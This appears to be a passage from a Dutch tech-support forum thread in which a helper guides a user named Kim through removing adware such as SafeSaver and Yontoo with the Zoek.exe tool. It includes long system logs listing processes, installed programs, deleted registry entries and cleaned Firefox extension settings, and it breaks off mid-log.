MSVCRT_amd64

MSVCRT110

MSVCRT110_amd64

MSXML 4.0 SP2 (KB954430)

MSXML 4.0 SP2 (KB973688)

NCDownloader

Nero 8 Ultra Edition HD

neroxml

Network64

Online Games Manager v1.20

OptimizerPro

Photo Common

Photo Gallery

PS_AIO_06_C4700_SW_Min

Rachel's Retreat

safe saaVE

SafeSaver 1.74

Scan

Search Assistant WebSearch 1.74

SearchNewTab

Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2736428)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)

Security Update for Microsoft .NET Framework 4 Extended (KB2487367)

Security Update for Microsoft .NET Framework 4 Extended (KB2656351)

Security Update for Microsoft .NET Framework 4 Extended (KB2736428)

Security Update for Microsoft .NET Framework 4 Extended (KB2742595)

Security Update for Microsoft Excel 2010 (KB2597126) 64-Bit Edition

Security Update for Microsoft Filter Pack 2.0 (KB2553501) 64-Bit Edition

Security Update for Microsoft InfoPath 2010 (KB2687422) 64-Bit Edition

Security Update for Microsoft InfoPath 2010 (KB2760406) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2553091)

Security Update for Microsoft Office 2010 (KB2553096)

Security Update for Microsoft Office 2010 (KB2553371) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2553447) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2589320) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2598243) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2687276) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2687501) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2687510) 64-Bit Edition

Security Update for Microsoft OneNote 2010 (KB2760600) 64-Bit Edition

Security Update for Microsoft Publisher 2010 (KB2553147) 64-Bit Edition

Security Update for Microsoft Visio 2010 (KB2810068) 64-Bit Edition

Security Update for Microsoft Visio Viewer 2010 (KB2687505) 64-Bit Edition

Security Update for Microsoft Word 2010 (KB2760410) 64-Bit Edition

Shop-N-Spree_Family Fortune

Shop for HP Supplies

SkypeT 6.3

SmartWebPrinting

SolutionCenter

Spotify

Status

Taalpakket voor Microsoft .NET Framework 4 Client Profile - NLD

Taalpakket voor Microsoft .NET Framework 4 Extended - NLD

Toolbox

TrayApp

Update for Microsoft .NET Framework 4 Client Profile (KB2468871)

Update for Microsoft .NET Framework 4 Client Profile (KB2533523)

Update for Microsoft .NET Framework 4 Client Profile (KB2600217)

Update for Microsoft .NET Framework 4 Extended (KB2468871)

Update for Microsoft .NET Framework 4 Extended (KB2533523)

Update for Microsoft .NET Framework 4 Extended (KB2600217)

Update for Microsoft Office 2010 (KB2553065)

Update for Microsoft Office 2010 (KB2553092)

Update for Microsoft Office 2010 (KB2553181) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553267) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553270) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553310) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553378) 64-Bit Edition

Update for Microsoft Office 2010 (KB2566458)

Update for Microsoft Office 2010 (KB2598242) 64-Bit Edition

Update for Microsoft Office 2010 (KB2687509) 64-Bit Edition

Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition

Update for Microsoft Office 2010 (KB2767886) 64-Bit Edition

Update for Microsoft OneNote 2010 (KB2553290) 64-Bit Edition

Update for Microsoft Outlook 2010 (KB2597090) 64-Bit Edition

Update for Microsoft Outlook 2010 (KB2687623) 64-Bit Edition

Update for Microsoft Outlook Social Connector 2010 (KB2553406) 64-Bit Edition

Update for Microsoft PowerPoint 2010 (KB2598240) 64-Bit Edition

Update for Microsoft SharePoint Workspace 2010 (KB2589371) 64-Bit Edition

VCRedistSetup

Visual Studio 2010 x64 Redistributables

VLC media player 2.0.4

WebReg

Windows Live Communications Platform

Windows Live Essentials

Windows Live ID Sign-in Assistant

Windows Live Installer

Windows Live Mail

Windows Live Messenger

Windows Live MIME IFilter

Windows Live Photo Common

Windows Live PIMT Platform

Windows Live SOXE

Windows Live SOXE Definitions

Windows Live UX Platform

Windows Live UX Platform Language Pack

Windows Live Writer

Windows Live Writer Resources

WinRAR 4.20 (32-bit)

WinRAR 4.20 (64-bit)

Yontoo 2.053

YrJie

==== EOF on wo 17-07-2013 at 22:08:53,03 ======================

- - - Updated - - -

Ik kon alleen van het vorige bericht het eerste bestand wat ik moest aanvinken niet vinden

Link naar reactie
Delen op andere sites

Ga naar configuratiescherm - programma's en verwijder onderstaande programma's. Deze programma's vormen een veiligheidsrisico voor je systeem en zijn verder totaal overbodig.

BBrowsee2sauvee

BrowseToSave 1.74

conotinuetossave

ContinueToSave 1.74

Incredibar Toolbar on IE

safe saaVE

SafeSaver 1.74

Yontoo 2.053

Download 51a612a8b27e2-Zoek.pngzoek.exe naar het bureaublad.

  • Schakel je antivirus- en antispywareprogramma's uit, mogelijk kunnen ze conflicteren met zoek.exe
    (hier of hier) kan je lezen hoe je dat doet.
  • Dubbelklik op Zoek.exe om de tool te starten.
  • Windows Vista, 7 en 8 gebruikers dienen de tool als "administrator" uit te voeren door middel van de rechtermuisknop en kiezen voor Als Administrator uitvoeren.
  • Klik op de knop "Options" en vink nu de onderstaande opties aan.

    • Running processes
    • Recently Created
    • Startup Information
    • Installed Programs
    • HijackThis Log
    • Auto Clean

    [*] Klik nu op de knop "Run script".

    [*] Wacht nu geduldig af tot er een logje opent (dit kan na een herstart zijn als deze benodigd is).

    [*] Mocht na de herstart geen logje verschijnen, start zoek.exe dan opnieuw, de log verschijnt dan alsnog.

    [*] Post nu de inhoud van het geopende logje in het volgende bericht.

Link naar reactie
Delen op andere sites

Zoek.exe Version 4.0.0.4 Updated 21-07-2013

Tool run by Kim on wo 24-07-2013 at 12:27:48,17.

Microsoft Windows 7 Professional 6.1.7601 Service Pack 1 x64

Running in: Normal Mode Internet Access Detected

==== Older Logs ======================

C:\zoek-results17-07-2013-2208.log 11842 bytes

==== Running Processes ======================

C:\Windows\system32\csrss.exe

C:\Windows\system32\wininit.exe

C:\Windows\system32\csrss.exe

C:\Windows\system32\services.exe

C:\Windows\system32\lsass.exe

C:\Windows\system32\lsm.exe

C:\Windows\system32\winlogon.exe

C:\Windows\system32\svchost.exe -k DcomLaunch

C:\Windows\system32\svchost.exe -k RPCSS

C:\Windows\system32\atiesrxx.exe

C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted

C:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted

C:\Windows\system32\svchost.exe -k LocalService

C:\Windows\system32\svchost.exe -k netsvcs

C:\Windows\system32\svchost.exe -k NetworkService

C:\Program Files\AVAST Software\Avast\AvastSvc.exe

C:\Windows\system32\atieclxx.exe

C:\Windows\system32\Dwm.exe

C:\Windows\Explorer.EXE

C:\Windows\System32\spoolsv.exe

C:\Windows\system32\svchost.exe -k LocalServiceNoNetwork

C:\Windows\system32\taskhost.exe

C:\Program Files (x86)\Common Files\Adobe\ARM\1.0\armsvc.exe

C:\Windows\SysWOW64\svchost.exe -k hpdevmgmt

C:\Program Files (x86)\Nero\Nero8\Nero BackItUp\NBService.exe

C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexStoreSvr.exe

C:\Windows\System32\svchost.exe -k HPZ12

C:\Users\Kim\AppData\Roaming\Spotify\Data\SpotifyWebHelper.exe

C:\Users\Kim\AppData\Roaming\Spotify\spotify.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqtra08.exe

C:\Program Files (x86)\Online Games Manager\ogmservice.exe

C:\Windows\SysWOW64\IoctlSvc.exe

C:\Windows\System32\svchost.exe -k HPZ12

C:\Windows\system32\svchost.exe -k imgsvc

C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSVC.EXE

C:\Program Files\Common Files\Microsoft Shared\Windows Live\WLIDSvcM.exe

C:\Windows\system32\svchost.exe -k HPService

C:\Windows\system32\svchost.exe -k NetworkServiceNetworkRestricted

C:\Program Files (x86)\Common Files\Nero\Lib\NMIndexingService.exe

C:\Program Files\AVAST Software\Avast\AvastUI.exe

C:\Program Files (x86)\HP\HP Software Update\hpwuschd2.exe

C:\Windows\system32\SearchIndexer.exe

C:\Program Files (x86)\Common Files\Java\Java Update\jusched.exe

C:\Program Files\Windows Media Player\wmpnetwk.exe

C:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqSTE08.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqbam08.exe

C:\Program Files (x86)\HP\Digital Imaging\bin\hpqgpc01.exe

C:\Windows\System32\svchost.exe -k secsvcs

C:\Windows\system32\Macromed\Flash\FlashUtil64_11_7_700_224_ActiveX.exe

C:\Program Files\Internet Explorer\iexplore.exe

C:\Program Files\Internet Explorer\iexplore.exe

C:\Windows\system32\taskeng.exe

C:\Program Files (x86)\HP\Digital Imaging\smart web printing\hpswp_clipbook.exe

C:\Windows\SysWOW64\Macromed\Flash\FlashUtil32_11_7_700_224_ActiveX.exe

C:\Windows\system32\wbem\wmiprvse.exe

C:\Users\Kim\zoek.exe

C:\Windows\system32\conhost.exe

C:\Windows\system32\taskhost.exe

==== Creating Sample_24-07-2013_1231.zip ======================

Process C:\Users\Kim\zoek.exe killed

Copied file C:\Users\Kim\Burger Shop 2.exe to sample\Burger Shop 2.exe

Copied file C:\Users\Kim\Shop-N-Spree Family Fortune.exe to sample\Shop-N-Spree Family Fortune.exe

Copied file C:\Users\Kim\zoek.exe to sample\zoek.exe

sample\Burger Shop 2.exe renamed to ECAE0A7862EB4F91F29AF6A474B2FCD1

sample\Shop-N-Spree Family Fortune.exe renamed to 879E8412F6F848CEA4EDBF8A89D3A4E4

sample\zoek.exe renamed to 4CBAA3D6741346AB1D46343C095E7A45

C:\Users\Public\Desktop\sample_24-07-2013_1231.zip created successfully

==== Deleting CLSID Registry Keys ======================

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Internet Explorer\SearchScopes\{0ECDF796-C2DC-4d79-A620-CCE0C0A66CC9} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Internet Explorer\SearchScopes\{afdbddaa-5d3f-42ee-b79c-185a7020515b} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Internet Explorer\SearchScopes\{BB74DE59-BC4C-4172-9AC4-73315F71CFFE} deleted successfully

HKEY_USERS\S-1-5-21-1635193343-2580408697-3417977720-1000\Software\Microsoft\Internet Explorer\SearchScopes\{cf6e4b1c-dbde-457e-9cef-ab8ecac8a5e8} deleted successfully

==== Deleting CLSID Registry Values ======================

==== Installed Programs ======================

64 Bit HP CIO Components Installer

Adobe Flash Player 11 ActiveX

Adobe Flash Player 11 Plugin

Adobe Reader XI (11.0.02) - Nederlands

avast Free Antivirus

BufferChm

Burger Shop 2

C4700

D3DX10

Definition Update for Microsoft Office 2010 (KB982726) 64-Bit Edition

Destinations

DeviceDiscovery

Dll-Files.com Fixer

FTDownloader

GoforFiles

Google Chrome

Google Toolbar for Internet Explorer

Google Update Helper

GPBaseService2

Hearts Medicine - Season One Deluxe

HiJackThis

HP Customer Participation Program 13.0

HP Imaging Device Functions 13.0

HP Photosmart C4700 All-In-One Driver Software 13.0 Rel .6

HP Print Projects 1.0

HP Smart Web Printing 4.5

HP Solution Center 13.0

HP Update

HPDiagnosticAlert

HPPhotoGadget

hpPrintProjects

HPProductAssistant

HPSSupply

hpWLPGInstaller

Java 7 Update 25

Java Auto Updater

Junk Mail filter update

MarketResearch

Microsoft .NET Framework 4 Client Profile

Microsoft .NET Framework 4 Client Profile NLD Language Pack

Microsoft .NET Framework 4 Extended

Microsoft .NET Framework 4 Extended NLD Language Pack

Microsoft Application Error Reporting

Microsoft Office 2010 Service Pack 1 (SP1)

Microsoft Office Access MUI (Dutch) 2010

Microsoft Office Excel MUI (Dutch) 2010

Microsoft Office Groove MUI (Dutch) 2010

Microsoft Office InfoPath MUI (Dutch) 2010

Microsoft Office Office 32-bit Components 2010

Microsoft Office OneNote MUI (Dutch) 2010

Microsoft Office Outlook MUI (Dutch) 2010

Microsoft Office PowerPoint MUI (Dutch) 2010

Microsoft Office Professional Plus 2010

Microsoft Office Proof (Dutch) 2010

Microsoft Office Proof (English) 2010

Microsoft Office Proof (French) 2010

Microsoft Office Proof (German) 2010

Microsoft Office Proofing (Dutch) 2010

Microsoft Office Publisher MUI (Dutch) 2010

Microsoft Office Shared 32-bit MUI (Dutch) 2010

Microsoft Office Shared MUI (Dutch) 2010

Microsoft Office Word MUI (Dutch) 2010

Microsoft Silverlight

Microsoft SQL Server 2005 Compact Edition [ENU]

Microsoft Visual C++ 2005 Redistributable

Microsoft Visual C++ 2008 Redistributable - x86 9.0.21022

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.4148

Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161

Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219

Microsoft XNA Framework Redistributable 3.1

Movie Maker

MSVCRT

MSVCRT_amd64

MSVCRT110

MSVCRT110_amd64

MSXML 4.0 SP2 (KB954430)

MSXML 4.0 SP2 (KB973688)

NCDownloader

Nero 8 Ultra Edition HD

neroxml

Network64

Online Games Manager v1.20

OptimizerPro

Photo Common

Photo Gallery

PS_AIO_06_C4700_SW_Min

Rachel's Retreat

Scan

Search Assistant WebSearch 1.74

SearchNewTab

Security Update for Microsoft .NET Framework 4 Client Profile (KB2604121)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656351)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656368v2)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2656405)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2686827)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2729449)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2736428)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2737019)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2742595)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2789642)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2804576)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2835393)

Security Update for Microsoft .NET Framework 4 Client Profile (KB2840628)

Security Update for Microsoft .NET Framework 4 Extended (KB2487367)

Security Update for Microsoft .NET Framework 4 Extended (KB2656351)

Security Update for Microsoft .NET Framework 4 Extended (KB2736428)

Security Update for Microsoft .NET Framework 4 Extended (KB2742595)

Security Update for Microsoft Excel 2010 (KB2597126) 64-Bit Edition

Security Update for Microsoft Filter Pack 2.0 (KB2553501) 64-Bit Edition

Security Update for Microsoft InfoPath 2010 (KB2687422) 64-Bit Edition

Security Update for Microsoft InfoPath 2010 (KB2760406) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2553091)

Security Update for Microsoft Office 2010 (KB2553096)

Security Update for Microsoft Office 2010 (KB2553371) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2553447) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2589320) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2598243) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2687276) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2687501) 64-Bit Edition

Security Update for Microsoft Office 2010 (KB2687510) 64-Bit Edition

Security Update for Microsoft OneNote 2010 (KB2760600) 64-Bit Edition

Security Update for Microsoft Publisher 2010 (KB2553147) 64-Bit Edition

Security Update for Microsoft Visio 2010 (KB2810068) 64-Bit Edition

Security Update for Microsoft Visio Viewer 2010 (KB2687505) 64-Bit Edition

Security Update for Microsoft Word 2010 (KB2760410) 64-Bit Edition

Shop-N-Spree_Family Fortune

Shop for HP Supplies

SkypeT 6.3

SmartWebPrinting

SolutionCenter

Spotify

Status

Taalpakket voor Microsoft .NET Framework 4 Client Profile - NLD

Taalpakket voor Microsoft .NET Framework 4 Extended - NLD

Toolbox

TrayApp

Update for Microsoft .NET Framework 4 Client Profile (KB2468871)

Update for Microsoft .NET Framework 4 Client Profile (KB2533523)

Update for Microsoft .NET Framework 4 Client Profile (KB2600217)

Update for Microsoft .NET Framework 4 Extended (KB2468871)

Update for Microsoft .NET Framework 4 Extended (KB2533523)

Update for Microsoft .NET Framework 4 Extended (KB2600217)

Update for Microsoft Office 2010 (KB2553065)

Update for Microsoft Office 2010 (KB2553092)

Update for Microsoft Office 2010 (KB2553181) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553267) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553270) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553310) 64-Bit Edition

Update for Microsoft Office 2010 (KB2553378) 64-Bit Edition

Update for Microsoft Office 2010 (KB2566458)

Update for Microsoft Office 2010 (KB2598242) 64-Bit Edition

Update for Microsoft Office 2010 (KB2687509) 64-Bit Edition

Update for Microsoft Office 2010 (KB2760631) 64-Bit Edition

Update for Microsoft Office 2010 (KB2767886) 64-Bit Edition

Update for Microsoft OneNote 2010 (KB2553290) 64-Bit Edition

Update for Microsoft Outlook 2010 (KB2597090) 64-Bit Edition

Update for Microsoft Outlook 2010 (KB2687623) 64-Bit Edition

Update for Microsoft Outlook Social Connector 2010 (KB2553406) 64-Bit Edition

Update for Microsoft PowerPoint 2010 (KB2598240) 64-Bit Edition

Update for Microsoft SharePoint Workspace 2010 (KB2589371) 64-Bit Edition

VCRedistSetup

Visual Studio 2010 x64 Redistributables

VLC media player 2.0.4

WebReg

Windows Live Communications Platform

Windows Live Essentials

Windows Live ID Sign-in Assistant

Windows Live Installer

Windows Live Mail

Windows Live Messenger

Windows Live MIME IFilter

Windows Live Photo Common

Windows Live PIMT Platform

Windows Live SOXE

Windows Live SOXE Definitions

Windows Live UX Platform

Windows Live UX Platform Language Pack

Windows Live Writer

Windows Live Writer Resources

WinRAR 4.20 (32-bit)

WinRAR 4.20 (64-bit)

YrJie

==== Deleting Services ======================

==== FireFox Fix ======================

ProfilePath: C:\Users\Kim\AppData\Roaming\Mozilla\Firefox\Profiles\o3rq6e92.default

---- Lines euo7_vtq@rrvueetj-.org removed from prefs.js ----

user_pref("extensions.bootstrappedAddons", "{\"pjzb@oiyo.co.uk\":{\"version\":\"3.8\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pjzb@oiyo.co.uk\"},\"beee8skl@tksdduisq.co.uk\":{\"version\":\"3.8\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\beee8skl@tksdduisq.co.uk\"},\"5uayyeeii@jrzxta.org\":{\"version\":\"1.0\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\"},\"u6rdxqq@oawewjhi.com\":{\"version\":\"3.8\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\u6rdxqq@oawewjhi.com\"},\"kg08cch@iofqz.edu\":{\"version\":\"1.0\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\"},\"qmb7wl@sdmwieh.com\":{\"version\":\"1.0\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\"},\"pdjx@iauy.net\":{\"version\":\"1.0\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\"},\"oyyikq@ouoeld.edu\":{\"version\":\"3.8\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\oyyikq@ouoeld.edu\"},\"nfbednr@uuyy-.org\":{\"version\":\"3.8\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\"},\"euo7_vtq@rrvueetj-.org\":{\"version\":\"3.8\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\euo7_vtq@rrvueetj-.org\"},\"cjcdqvyuyu@odwkhl.net\":{\"version\":\"1.0\",\"type\":\"extension\",\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\"}}");

---- Lines euo7_vtq@rrvueetj-.org modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"beee8skl@tksdduisq.co.uk\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\beee8skl@tksdduisq.co.uk\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"euo7_vtq@rrvueetj-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\euo7_vtq@rrvueetj-.org\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"oyyikq@ouoeld.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\oyyikq@ouoeld.edu\",\"mtime\":1367710019840},\"pdjx@iauy.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pdjx@iauy.net\",\"mtime\":1367710019878},\"pjzb@oiyo.co.uk\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\pjzb@oiyo.co.uk\",\"mtime\":1367710019912},\"qmb7wl@sdmwieh.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\qmb7wl@sdmwieh.com\",\"mtime\":1367710019941},\"u6rdxqq@oawewjhi.com\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\u6rdxqq@oawewjhi.com\",\"mtime\":1367710019977}}}]");

---- Lines euo7_vtq@rrvueetj-.org removed from user.js ----

---- Lines beee8skl@tksdduisq.co.uk removed from prefs.js ----

---- Lines beee8skl@tksdduisq.co.uk modified from prefs.js ----

user_pref("extensions.installCache", "[{\"name\":\"winreg-app-global\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926},\"wrc@avast.com\":{\"descriptor\":\"C:\\\\Program Files\\\\AVAST Software\\\\Avast\\\\WebRep\\\\FF\",\"mtime\":1363722322307}}},{\"name\":\"app-global\",\"addons\":{\"{972ce4c6-7e08-4474-a285-3208198ce6fd}\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\extensions\\\\{972ce4c6-7e08-4474-a285-3208198ce6fd}\",\"mtime\":1366386998658}}},{\"name\":\"winreg-app-user\",\"addons\":{\"smartwebprinting@hp.com\":{\"descriptor\":\"C:\\\\Program Files (x86)\\\\HP\\\\Digital Imaging\\\\Smart Web Printing\\\\MozillaAddOn3\",\"mtime\":1352924793926}}},{\"name\":\"app-profile\",\"addons\":{\"5uayyeeii@jrzxta.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\5uayyeeii@jrzxta.org\",\"mtime\":1367710019604},\"beee8skl@tksdduisq.co.uk\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\beee8skl@tksdduisq.co.uk\",\"mtime\":1367710019648},\"cjcdqvyuyu@odwkhl.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\cjcdqvyuyu@odwkhl.net\",\"mtime\":1367710019688},\"disabled\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\disabled\",\"mtime\":1367710019721},\"kg08cch@iofqz.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\kg08cch@iofqz.edu\",\"mtime\":1367710019761},\"leethax@leethax.net\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\leethax@leethax.net.xpi\",\"mtime\":1365192788087},\"nfbednr@uuyy-.org\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\\Profiles\\\\o3rq6e92.default\\\\extensions\\\\nfbednr@uuyy-.org\",\"mtime\":1367710019803},\"oyyikq@ouoeld.edu\":{\"descriptor\":\"C:\\\\Users\\\\Kim\\\\AppData\\\\Roaming\\\\Mozilla\\\\Firefox\\\